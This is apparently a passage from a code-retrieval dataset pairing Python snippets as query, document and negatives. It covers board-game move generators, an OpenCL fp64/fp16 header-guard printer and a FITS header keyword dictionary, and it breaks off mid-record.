copy.deepcopy(valid_actions)", "def human_turn(c_choice, h_choice,xi,yi):\r\n depth = len(empty_cells(board))\r\n if depth == 0 or game_over(board):\r\n return\r\n\r\n # Dictionary of valid moves\r\n move = -1\r\n moves = {\r\n 0: [0, 0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5], 6: [0, 6], 7: [0, 7], 8: [0, 8], 9: [0, 9],\r\n 10: [1, 0], 11: [1, 1], 12: [1, 2], 13: [1, 3], 14: [1, 4], 15: [1, 5], 16: [1, 6], 17: [1, 7], 18: [1, 8], 19: [1, 9],\r\n 20: [2, 0], 21: [2, 1], 22: [2, 2], 23: [2, 3], 24: [2, 4], 25: [2, 5], 26: [2, 6], 27: [2, 7], 28: [2, 8], 29: [2, 9],\r\n 30: [3, 0], 31: [3, 1], 32: [3, 2], 33: [3, 3], 34: [3, 4], 35: [3, 5], 36: [3, 6], 37: [3, 7], 38: [3, 8], 39: [3, 9],\r\n 40: [4, 0], 41: [4, 1], 42: [4, 2], 43: [4, 3], 44: [4, 4], 45: [4, 5], 46: [4, 6], 47: [4, 7], 48: [4, 8], 49: [4, 9],\r\n 50: [5, 0], 51: [5, 1], 52: [5, 2], 53: [5, 3], 54: [5, 4], 55: [5, 5], 56: [5, 6], 57: [5, 7], 58: [5, 8], 59: [5, 9],\r\n 60: [6, 0], 61: [6, 1], 62: [6, 2], 63: [6, 3], 64: [6, 4], 65: [6, 5], 66: [6, 6], 67: [6, 7], 68: [6, 8], 69: [6, 9],\r\n 70: [7, 0], 71: [7, 1], 72: [7, 2], 73: [7, 3], 74: [7, 4], 75: [7, 5], 76: [7, 6], 77: [7, 7], 78: [7, 8], 79: [7, 9],\r\n 80: [8, 0], 81: [8, 1], 82: [8, 2], 83: [8, 3], 84: [8, 4], 85: [8, 5], 86: [8, 6], 87: [8, 7], 88: [8, 8], 89: [8, 9],\r\n 90: [9, 0], 91: [9, 1], 92: [9, 2], 93: [9, 3], 94: [9, 4], 95: [9, 5], 96: [9, 6], 97: [9, 7], 98: [9, 8], 99: [9, 9],\r\n \r\n }\r\n\r\n clean()\r\n print(f'Human turn [{h_choice}]')\r\n render(board, c_choice, h_choice)\r\n while move < 0 or move > 99:\r\n try:\r\n move = int(input('Final position HUMAN (0..99): '))\r\n coord = moves[move]\r\n can_move = set_move(coord[0], coord[1], 2, xi, yi)\r\n if not can_move:\r\n print('Bad move')\r\n move = -1\r\n except (EOFError, KeyboardInterrupt):\r\n print('Bye')\r\n exit()\r\n except (KeyError, ValueError):\r\n print('Bad choice')", "def make_move(self, state):\r\n # intially set drop phase to true\r\n drop_phase = True\r\n move = [] # list to make moves with to return\r\n succ = self.succ(state) # get the successor of this state\r\n # intial postion of board to set up most advantagous spot if its empty\r\n if sum(x.count(self.my_piece) for x in self.board) == 0 and self.board[2][2] == ' ':\r\n move.insert(0, (2, 2))\r\n return move\r\n \r\n # check the number of 'r' and 'b' on board if theres 4 of each drop phase is false\r\n if sum(x.count('r') for x in self.board) == 4 and sum(x.count('b') for x in self.board) == 4:\r\n drop_phase = False\r\n\r\n # if not during drop phase use minimax to make next move from one postion to next\r\n if not drop_phase:\r\n move = []\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n f = d['from']\r\n s = sorted(succ, key=lambda e: e['f'])\r\n moveto = s[-1]\r\n move.insert(1, (moveto['from'][0], moveto['from'][1]))\r\n move.insert(0, (moveto['pos'][0], moveto['pos'][1]))\r\n return move # return the from, to move\r\n\r\n else: #else use minimax and to make move during drop phase selecting spot to place AI piece\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n hold = []\r\n move = []\r\n n = None\r\n hold = []\r\n for s in succ:\r\n p = s['pos'][0]\r\n p1 = s['pos'][1]\r\n if s['f'] == val and state[p][p1] == ' ':\r\n hold.append(s)\r\n if len(hold) == 1:\r\n row = hold[0]['pos'][0]\r\n col = hold[0]['pos'][1]\r\n else:\r\n f = sorted(hold, key=lambda e: e['pos'])\r\n row = f[0]['pos'][0]\r\n col = f[0]['pos'][1]\r\n\r\n move.insert(0, (row, col)) # return the move \r\n return move", "def get_next_moves2(self):\n moves = []\n for i in range(len(self.board)):\n for j in range(len(self.board[i])):\n if self.board[i][j] == \"\" and self.move_makes_box(i, j):\n next_board = copy.deepcopy(self.board)\n next_board[i][j] = colors[self.turn] + self.turn + \"\\u001b[0m\"\n next_turn = get_opponent(self.turn)\n moves.append(DotsAndBoxesState(next_board, next_turn))\n return moves", "def get_tiger_possible_moves(self) -> List:\n moves = []\n for pos in self.get_all_positions():\n if pos.is_tiger():\n addr_from = pos.address\n for addr_to in pos.piece.get_valid_moves():\n moves.append((addr_from, addr_to))\n\n return moves", "def ai_move():\n\tinitial_state = map(get_filled_edges, rects)\n\tpossible_moves = []\n\tfor index, filled_edges in enumerate(initial_state):\n\t\tif filled_edges == 0:\n\t\t\tpossible_moves.extend([(index, i) for i in 'ltrb'])\n\t\telif filled_edges == 1:\n\t\t\tpossible_moves.extend(one_filled_edge(index))\n\t\telif filled_edges == 2:\n\t\t\tpossible_moves.extend(two_filled_edge(index))\n\t\telif filled_edges == 3:\n\t\t\tpossible_moves.extend(three_filled_edge(index))\n\tprint possible_moves\n\tpossible_decisions = []\n\tfor move in possible_moves:\n\t\tfinal_state = apply_move(move)\n\t\tpossible_decisions.append(is_feasible(initial_state, final_state))\n\tprint possible_decisions\n\t# randomizing when some decisions have the same weight\n\tmax_weight = max(possible_decisions)\n\t# list of indices which have the same weight\n\tmax_indices = []\n\tfor index, weight in enumerate(possible_decisions):\n\t\tif weight == max_weight:\n\t\t\tmax_indices.append(index)\n\tx = choice(max_indices)\n\tprint x\n\treturn possible_moves[x]\n\t# return possible_moves[possible_decisions.index(max(possible_decisions))]", "def get_knight_moves(self, i, j, moves):\r\n directions = ((2, 1), (2, -1), (1, 2), (1, -2), (-2, 1), (-2, -1), (-1, 2), (-1, -2))\r\n if self.turn_white:\r\n opon = 'b'\r\n else:\r\n opon = 'w'\r\n for d in directions:\r\n cri = i + d[0]\r\n crj = j + d[1]\r\n if 0 <= cri <= 7 and 0 <= crj <= 7:\r\n # empty\r\n if self.board[cri][crj][0] == '-':\r\n moves.append(Move((i, j), (cri, crj), self.board))\r\n\r\n # oponent\r\n elif self.board[cri][crj][0] == opon:\r\n moves.append(Move((i, j), (cri, crj), self.board))", "def get_valid_moves(self) -> list[int]:\n return self._valid_moves", "def get_all_possible_moves(self, state):\n move_list = []\n done_finding_moves = False\n any_non_pass_moves = False\n while not done_finding_moves:\n try:\n m = next(self.move_generator) # Gets a (move, state) pair.\n # print(\"next returns: \",m[0]) # Prints out the move. For debugging.\n if m[0] != 'p':\n any_non_pass_moves = True\n move_list.append(m) # Add the move to the list.\n except StopIteration as e:\n done_finding_moves = True\n if not any_non_pass_moves:\n move_list.append(('p',state))\n return move_list", "def newGame(self):\n self.last_move = \"go\"\n self.values = [None for i in range(64)]\n for i in range(8):\n self.setPiece(i, 2, self.makePiece(ChessPiece.WHITE_PAWN, i, 2, \"wpawn\"+str(i)))\n self.setPiece(i, 7, self.makePiece(ChessPiece.BLACK_PAWN, i, 7, \"bpawn\"+str(i)))\n\n self.setPiece('a', 1, self.makePiece(ChessPiece.WHITE_ROOK, 'a', 1, \"wrook0\"))\n self.setPiece('b', 1, self.makePiece(ChessPiece.WHITE_KNIGHT, 'b', 1, \"wknight0\"))\n self.setPiece('c', 1, self.makePiece(ChessPiece.WHITE_BISHOP, 'c', 1, \"wbishop0\"))\n self.setPiece('d', 1, self.makePiece(ChessPiece.WHITE_QUEEN, 'd', 1, \"wqueen\"))\n self.setPiece('e', 1, self.makePiece(ChessPiece.WHITE_KING, 'e', 1, \"wking\"))\n self.setPiece('f', 1, self.makePiece(ChessPiece.WHITE_BISHOP, 'f', 1, \"wbishop1\"))\n self.setPiece('g', 1, self.makePiece(ChessPiece.WHITE_KNIGHT, 'g', 1, \"wknight1\"))\n self.setPiece('h', 1, self.makePiece(ChessPiece.WHITE_ROOK, 'h', 1, \"wrook1\"))\n\n self.setPiece('a', 8, self.makePiece(ChessPiece.BLACK_ROOK, 'a', 8, \"brook0\"))\n self.setPiece('b', 8, self.makePiece(ChessPiece.BLACK_KNIGHT, 'b', 8, \"bknight0\"))\n self.setPiece('c', 8, self.makePiece(ChessPiece.BLACK_BISHOP, 'c', 8, \"bbishop0\"))\n self.setPiece('d', 8, self.makePiece(ChessPiece.BLACK_QUEEN, 'd', 8, \"bqueen\"))\n self.setPiece('e', 8, self.makePiece(ChessPiece.BLACK_KING, 'e', 8, \"bking\"))\n self.setPiece('f', 8, self.makePiece(ChessPiece.BLACK_BISHOP, 'f', 8, \"bbishop1\"))\n self.setPiece('g', 8, self.makePiece(ChessPiece.BLACK_KNIGHT, 'g', 8, \"bknight1\"))\n self.setPiece('h', 8, self.makePiece(ChessPiece.BLACK_ROOK, 'h', 8, \"brook1\"))", "def mappossiblemoves(self,nodeStart):\n destinations = [set() for ix in range(game.DICEMAX+1)]\n destinations[0] = set([nodeStart])\n routes = [[nodeStart]]\n #\n # TODO: Not convinced this adds anything more than it harms in this fn.\n #if self.hasEnteredRoomYet:\n # GAMEBOARD = game.TRIMMEDNODES\n #else:\n GAMEBOARD = game.BOARDNODES\n #\n for diceRoll in range(1,game.DICEMAX+1):\n newRoutes = []\n for route in routes:\n for nextLoc in GAMEBOARD[route[-1]]:\n if not nextLoc in route:\n # This location has not yet been visited by this route\n if nextLoc in game.ALLOWEDROOMNODES:\n # Location is a room - can move into it regardless\n # of population, but not move further. We can also\n # use any longer roll to move here by this route\n for thisRoll in range(diceRoll,game.DICEMAX+1):\n destinations[thisRoll].add(nextLoc)\n else:\n # Location is a square - can only move into it if\n # unoccupied, but can move further once there.\n if not nextLoc in self.charLocations:\n # Unoccupied (could check against \n # charLocations[1:] since we're the piece moving\n # but a nextLoc = charLocations[0] would be\n # rejected by being already in the route anyway)\n newRoute = list(route)\n newRoute.append(nextLoc)\n newRoutes.append(newRoute)\n destinations[diceRoll].add(nextLoc)\n routes = newRoutes\n #\n return [list(destSet) for destSet in destinations]", "def _get_easy_move(self):\n # Two lists keep track of regular moves and paths of possible jumps\n moves = []\n required_jumps = []\n for row in range(self._checkers.dimension):\n for col in range(self._checkers.dimension):\n # Check same color pieces as player to see if they can jump.\n if self._checkers.get(row, col) == self._player:\n path_made = False\n found_jumps = []\n # i represents an option of direction to check\n for i in range(3):\n current_path = []\n # Builds a path of jumps by checking for a jump each\n # move\n while (not path_made):\n jumps = self.check_for_jump(self._player, row, col)\n if jumps == []:\n path_made = True\n break\n current_path += (jumps)\n incrow = 0\n inccol = 0\n # South west and east\n if i == 0:\n incrow = 2\n inccol = 2\n elif i == 1:\n incrow = 2\n incrow = -2\n # North west and east\n elif i == 2:\n incrow = -2\n inccol = -2\n elif i == 3:\n incrow = -2\n incrow = 2\n row += incrow\n col += inccol\n found_jumps.append(current_path)\n if len(found_jumps) > 0:\n # If there is at least one path then we append it\n # to the list of jumps\n required_jumps += found_jumps\n else:\n # Checks if a move can be made in each direction\n north_west = self._checkers.get(row - 1, col - 1)\n north_east = self._checkers.get(row - 1, col + 1)\n south_west = self._checkers.get(row + 1, col + 1)\n south_east = self._checkers.get(row + 1, col - 1)\n if north_west == CheckersBoard.empty:\n moves.append(Move(row, col, -1, -1))\n if north_east == CheckersBoard.empty:\n moves.append(Move(row, col, -1, 1))\n if south_west == CheckersBoard.empty:\n moves.append(Move(row, col, 1, 1))\n if south_east == CheckersBoard.empty:\n moves.append(Move(row, col, 1, -1))\n # A random move is calculated for the lists of moves\n # If a move can be made we prioritize the list with possible moves\n random_index = 0\n if len(required_jumps) != 0:\n random_index = random.randint(0, len(required_jumps))\n move_path = required_jumps[random_index]\n return move_path\n else:\n random_index = random.randint(0, len(moves))\n move = moves[random_index]\n return [move]", "def moves(self):\n\n moves = list()\n\n for row in range(HEIGHT):\n for col in range(WIDTH):\n\n move = (row, col)\n\n if self.board[row][col] == 9:\n moves.append(move)\n\n if self.board[row][col] == 1 or self.board[row][col] == 2:\n\n move = (row - 1, col)\n\n if self.board[row - 1][col] == 1 or self.board[row - 1][col] == 2:\n\n pass\n\n else:\n\n moves.append(move)\n\n return moves" ]
[ "0.75860536", "0.7416093", "0.7053937", "0.69375557", "0.68239874", "0.67419034", "0.6697224", "0.6633449", "0.6593096", "0.6580948", "0.6536958", "0.65312415", "0.6490962", "0.64726305", "0.64582986", "0.6440909", "0.6390071", "0.6388789", "0.6385916", "0.6381437", "0.63710254", "0.63576955", "0.63572484", "0.63524354", "0.6325016", "0.6296218", "0.626708", "0.6246886", "0.62425584", "0.6235418", "0.62333894", "0.617431", "0.61415243", "0.6133272", "0.6133194", "0.6123466", "0.6108762", "0.60694885", "0.605355", "0.6045947", "0.604326", "0.6035398", "0.60096234", "0.6007973", "0.59959507", "0.5990438", "0.598295", "0.5980893", "0.5979063", "0.597579", "0.5970684", "0.59592587", "0.5957785", "0.5954065", "0.59422463", "0.5937205", "0.5934573", "0.5933172", "0.59103423", "0.5907071", "0.5893204", "0.58764154", "0.5867412", "0.58669657", "0.58520794", "0.5830685", "0.58213395", "0.58195806", "0.5796089", "0.5794658", "0.57924294", "0.5791798", "0.5776545", "0.5770644", "0.57703793", "0.5768232", "0.576637", "0.57627904", "0.5755819", "0.57514524", "0.57498765", "0.57493526", "0.57490695", "0.57433677", "0.5738535", "0.5736442", "0.57326424", "0.57324845", "0.57311463", "0.57151866", "0.57114714", "0.57083285", "0.57079154", "0.5703361", "0.5701694", "0.5698856", "0.56968474", "0.5694203", "0.56839556", "0.56838477" ]
0.5896593
60
This function will optionally print a header guard for `cl_khr_fp64` if a 64bit type is used as the source or destination and return a bool that indicates whether this guard will need closed after the calling function has finished printing functions that use the 64bit source/destination type.
def conditional_guard(src, dst): int64_count = 0 float64_count = 0 float16_count = 0 if src in int64_types or dst in int64_types: int64_count = 1 if src in float64_types or dst in float64_types: float64_count = 1 if src in float16_types or dst in float16_types: float16_count = 1 if float16_count > 0: print("#ifdef cl_khr_fp16") if float64_count > 0: #In embedded profile, if cl_khr_fp64 is supported cles_khr_int64 has to be print("#ifdef cl_khr_fp64") return 1 + float16_count elif int64_count > 0: print("#if defined cles_khr_int64 || !defined(__EMBEDDED_PROFILE__)") return 1 + float16_count return float16_count
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_64_windows():\n return struct.calcsize('P') * 8 == 64", "def have_binary128():\n try:\n ti = type_info(np.longdouble)\n except FloatingError:\n return False\n return (ti['nmant'], ti['maxexp']) == (112, 16384)", "def is_H(self):\n return True", "def is_H(self):\n return True", "def is_64bit(self):\n pass", "def verify_header (filename, htypes=None):\n\n # dictionary\n dict_head = {\n # raw header\n # commenting out SIMPLE, BSCALE and BZERO - basic keywords\n # that will be present in images but not in binary fits tables\n #'SIMPLE': {'htype':'raw', 'dtype':bool, 'DB':False, 'None_OK':True},\n #'BSCALE': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n #'BZERO': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BITPIX': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'NAXIS': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'NAXIS1': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'NAXIS2': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'BUNIT': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n #'CCD-AMP': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'SET-TEMP': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'CCD-TEMP': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'XBINNING': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'YBINNING': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n #'CCD-SET': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'ALTITUDE': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'AZIMUTH': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'DOMEAZ': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'RADESYS': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'EPOCH': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'RA': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'RA-REF': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n #'RA-TEL': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'DEC': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'DEC-REF': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n #'DEC-TEL': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'HA': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'FLIPSTAT': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'EXPTIME': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'ISTRACKI': {'htype':'raw', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'ACQSTART': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'ACQEND': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'GPSSTART': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'GPSEND': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'GPS-SHUT': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'DATE-OBS': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'MJD-OBS': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'LST': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'UTC': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'TIMESYS': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'ORIGIN': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'MPC-CODE': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'TELESCOP': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'CL-BASE': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RH-MAST': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RH-DOME': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RH-AIRCO': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RH-PIER': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PRESSURE': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-PIER': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-DOME': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-ROOF': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-AIRCO': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-MAST': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-STRUT': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-CRING': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-SPIDER': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-FWN': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-FWS': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-M2HOLD': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-GUICAM': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-M1': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-CRYWIN': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-CRYGET': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-CRYCP': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PRES-CRY': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'WINDAVE': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'WINDGUST': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'WINDDIR': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'SITELAT': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'SITELONG': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'ELEVATIO': {'htype':'raw', 'dtype':int, 'DB':True, 'None_OK':True},\n #'WEATIME': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'FILTER': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n #'FILTERID': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'CCD-ID': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'CONTROLL': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'DETSPEED': {'htype':'raw', 'dtype':int, 'DB':True, 'None_OK':True},\n 'CCD-NW': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'CCD-NH': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'INSTRUME': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'FOCUSPOS': {'htype':'raw', 'dtype':int, 'DB':True, 'None_OK':True},\n 'IMAGETYP': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'OBJECT': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'AIRMASS': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'ORIGFILE': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'OBSERVER': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'ABOTVER': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'PROGNAME': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'PROGID': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'GUIDERST': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'GUIDERFQ': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'TRAKTIME': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'ADCX': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'ADCY': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n #\n # full header\n 'BB-V': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':False},\n 'BB-START': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':False},\n 'KW-V': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':False},\n 'LOG': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'LOG-IMA': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'N-INFNAN': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'XTALK-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'XTALK-F': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'NONLIN-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'NONLIN-F': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'GAIN-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'GAIN': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'GAIN1': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'GAIN16': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'OS-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'BIASMEAN': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'BIASM1': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'BIASM16': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RDNOISE': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RDN1': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RDN16': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'BIAS1A0': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BIAS1A1': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'VFITOK1': {'htype':'full', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'BIAS16A0': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BIAS16A1': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'VFITOK16': {'htype':'full', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'MBIAS-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'MBIAS-F': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'MB-NDAYS': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'SATURATE': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'NOBJ-SAT': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'MFLAT-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'MFLAT-F': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'MF-NDAYS': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'MFRING-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'MFRING-F': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'FRRATIO': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'COSMIC-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'NCOSMICS': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'SAT-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'NSATS': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'REDFILE': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'MASKFILE': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'S-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'S-V': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'S-NOBJ': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'S-FWHM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'S-FWSTD': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'S-SEEING': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-SEESTD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-ELONG': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-ELOSTD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-BKG': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-BKGSTD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'S-VIGNET': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'BKG-CORR': {'htype':'full', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'BKG-CHI2': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BKG-CF1': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BKG-CF16': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BKG-FDEG': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'BKG-FC0': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'A-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'A-V': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'A-INDEX': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'A-PSCALE': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'A-PSCALX': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'A-PSCALY': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'A-ROT': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'A-ROTX': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'A-ROTY': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'A-CAT-F': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'A-NAST': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'A-TNAST': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'A-NAMAX': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'A-DRA': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'A-DRASTD': {'htype':'full', 'dtype':float, 'DB':True, 